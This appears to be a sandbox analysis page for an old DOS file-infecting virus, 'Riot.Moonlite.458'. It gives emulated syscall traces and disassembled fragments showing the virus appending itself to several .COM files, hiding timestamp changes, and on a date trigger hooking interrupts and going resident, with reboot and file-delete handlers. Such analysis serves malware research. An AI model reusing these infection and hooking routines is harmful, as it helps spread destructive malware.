Sample viewer

vx.netlux.org/Virus.DOS.Riot.Moonlite.458

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:50.996071431Z 26 PC: 12a82 | Set disk transfer address
2018-12-17T22:57:50.997749522Z 78 PC: 12a8d | Find first file
2018-12-17T22:57:51.003551959Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.018623287Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:57:51.030006879Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.036464739Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.038027767Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.041430517Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.053604427Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.05464795Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.060019237Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.061562152Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.06947794Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.079187393Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.085449705Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.095072594Z 61 PC: 12ab6 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:57:51.101789576Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.109694111Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.111278518Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.113898863Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.118024025Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.119621261Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.122455475Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.124802477Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.132346824Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.142051313Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.145261355Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.154923312Z 61 PC: 12ab6 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:57:51.161611243Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.168480458Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.17006181Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.172417053Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.181008847Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.182891212Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.189419316Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.191169142Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.19974596Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.209676346Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.212578871Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.223222243Z 61 PC: 12ab6 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:57:51.230082508Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.236557986Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.239941313Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.24285699Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.245941841Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.248294435Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.251406875Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.253117899Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.260600305Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.270774754Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.273628646Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.283743965Z 61 PC: 12ab6 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:57:51.29051052Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.297743011Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.301937544Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.305348205Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.308205584Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.309660554Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.313977126Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.315448257Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.323074622Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.340037909Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.343603751Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.355883752Z 61 PC: 12ab6 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:57:51.364442789Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.371877116Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.374578879Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.379370844Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.389116335Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.390774745Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.398189053Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.399957445Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.408954228Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.427749285Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.430891536Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.447192407Z 61 PC: 12ab6 | Open file (Filename = 'PAH.COM')
2018-12-17T22:57:51.456218132Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.463012497Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.464378205Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.467100058Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.469198475Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.470298364Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.472360841Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.474207838Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.484343284Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.492483639Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.495124525Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.503769546Z 61 PC: 12ab6 | Open file (Filename = 'TEST.COM')
2018-12-17T22:57:51.508749714Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.514707727Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.516213136Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.518039696Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.524170725Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.525418363Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.531031789Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.532981659Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.540703578Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.550807528Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.554626011Z 42 PC: 12b1f | Get date 0x12b1f: cmp dl, 1
0x12b22: je 0x12b26
0x12b24: jmp 0x12b8d
0x12b26: mov ah, 9
0x12b28: lea dx, word ptr [bp + 0x2a9]
0x12b2c: int 0x21
0x12b2e: jmp 0x12b5a
0x12b30: push ax
0x12b31: in al, 0x60
0x12b33: cmp al, 0x53
0x12b35: je 0x12b3d
0x12b37: pop ax
0x12b38: ljmp ptr cs:[0x2cd]
0x12b3d: ljmp 0xffff:0
0x12b42: iret
0x12b43: cmp ax, 0x4b00
0x12b46: jne 0x12b4c
0x12b48: mov ah, 0x41
0x12b4a: int 0x21
0x12b4c: cmp ax, 0x4b9f
2018-12-17T22:57:51.557226966Z 26 PC: 12b96 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12688,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:58.774564605Z 26 PC: 12a82 | Set disk transfer address
2018-12-25T12:35:58.775840447Z 78 PC: 12a8d | Find first file
2018-12-25T12:35:58.785344402Z 67 PC: 12aad | Get or set file attributes
2018-12-25T12:35:58.799732968Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:35:58.809074247Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:35:58.814270132Z 66 PC: 12aca | Move file pointer
2018-12-25T12:35:58.815358052Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-25T12:35:58.81712066Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-25T12:35:58.834630043Z 66 PC: 12ae8 | Move file pointer
2018-12-25T12:35:58.835819776Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:35:58.840874731Z 87 PC: 12b06 | Get or set file date and time
2018-12-25T12:35:58.843708081Z 62 PC: 12b0a | Close file
2018-12-25T12:35:58.852302681Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:35:58.859241423Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.861738958Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.869596451Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.876173008Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.881242879Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.882749504Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.884537513Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.886716151Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.888371355Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.890229734Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.891677626Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:58.89911627Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:58.9092534Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.914021149Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.927139478Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.935178572Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.942756548Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.945194913Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.948247666Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.958280606Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.961531381Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.969330823Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.971146973Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:58.980300384Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:58.988633114Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.990598749Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.997861127Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.006118161Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.012673148Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.014079368Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.016634381Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.01881366Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.020004484Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.02298419Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.024286652Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.03030457Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.038952395Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.043006206Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.054480693Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.063130268Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.070797223Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.072926232Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.076097711Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.080390666Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.081996246Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.084997191Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.087825515Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.098430373Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.109685057Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.113853655Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.125559819Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.133327071Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.14590423Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.147822833Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.151020455Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.16535842Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.167385127Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.175501971Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.177802125Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.187420612Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.199378356Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.202562081Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.214673829Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.224265549Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.232145842Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.234620762Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.237762387Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.241505964Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.244676529Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.248038939Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.250139925Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.259758325Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.271574812Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.27500483Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.287762555Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.296028354Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.304188664Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.306226757Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.310491686Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.320009412Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.322007152Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.330962717Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.333041358Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.342310223Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.355741301Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.359274263Z 42 PC: 12b1f | Get date 0x12b1f: cmp dl, 1
0x12b22: je 0x12b26
0x12b24: jmp 0x12b8d
0x12b26: mov ah, 9
0x12b28: lea dx, word ptr [bp + 0x2a9]
0x12b2c: int 0x21
0x12b2e: jmp 0x12b5a
0x12b30: push ax
0x12b31: in al, 0x60
0x12b33: cmp al, 0x53
0x12b35: je 0x12b3d
0x12b37: pop ax
0x12b38: ljmp ptr cs:[0x2cd]
0x12b3d: ljmp 0xffff:0
0x12b42: iret
0x12b43: cmp ax, 0x4b00
0x12b46: jne 0x12b4c
0x12b48: mov ah, 0x41
0x12b4a: int 0x21
0x12b4c: cmp ax, 0x4b9f
2018-12-25T12:35:59.362184314Z 9 PC: 12b2e | Display string (String= 'Bad command or filename')
2018-12-25T12:35:59.366074376Z 53 PC: 12b5f | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:35:59.368264832Z 37 PC: 12b71 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:35:59.369983676Z 53 PC: 12b76 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:35:59.371751634Z 37 PC: 12b88 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:35:59.374613236Z 49 PC: 12b8d | Terminate and stay resident (Return code = '0' | Memory size = '34')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12688,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:58.794314367Z 26 PC: 12a82 | Set disk transfer address
2018-12-25T12:35:58.796138201Z 78 PC: 12a8d | Find first file
2018-12-25T12:35:58.802567116Z 67 PC: 12aad | Get or set file attributes
2018-12-25T12:35:58.81774094Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:35:58.824796091Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:35:58.831788455Z 66 PC: 12aca | Move file pointer
2018-12-25T12:35:58.832789108Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-25T12:35:58.834834442Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-25T12:35:58.843762184Z 66 PC: 12ae8 | Move file pointer
2018-12-25T12:35:58.84508354Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:35:58.851493144Z 87 PC: 12b06 | Get or set file date and time
2018-12-25T12:35:58.853591479Z 62 PC: 12b0a | Close file
2018-12-25T12:35:58.862093806Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:35:58.872188121Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.875441895Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.891996098Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.896303595Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.902863536Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.904259474Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.906595585Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.910490047Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.911895657Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.914019075Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.915799675Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:58.92406658Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:58.936484171Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.93913516Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.949374909Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.955693368Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.961756217Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.963621024Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.970583342Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.982412505Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.984513668Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.990928405Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.992293187Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.000744222Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.014295391Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.021150704Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.114490133Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.121706682Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.128045321Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.130276714Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.132681915Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.135557895Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.137584646Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.144541115Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.146294696Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.236855212Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.357342254Z 79 PC: 12a8d | Find next file (See above)
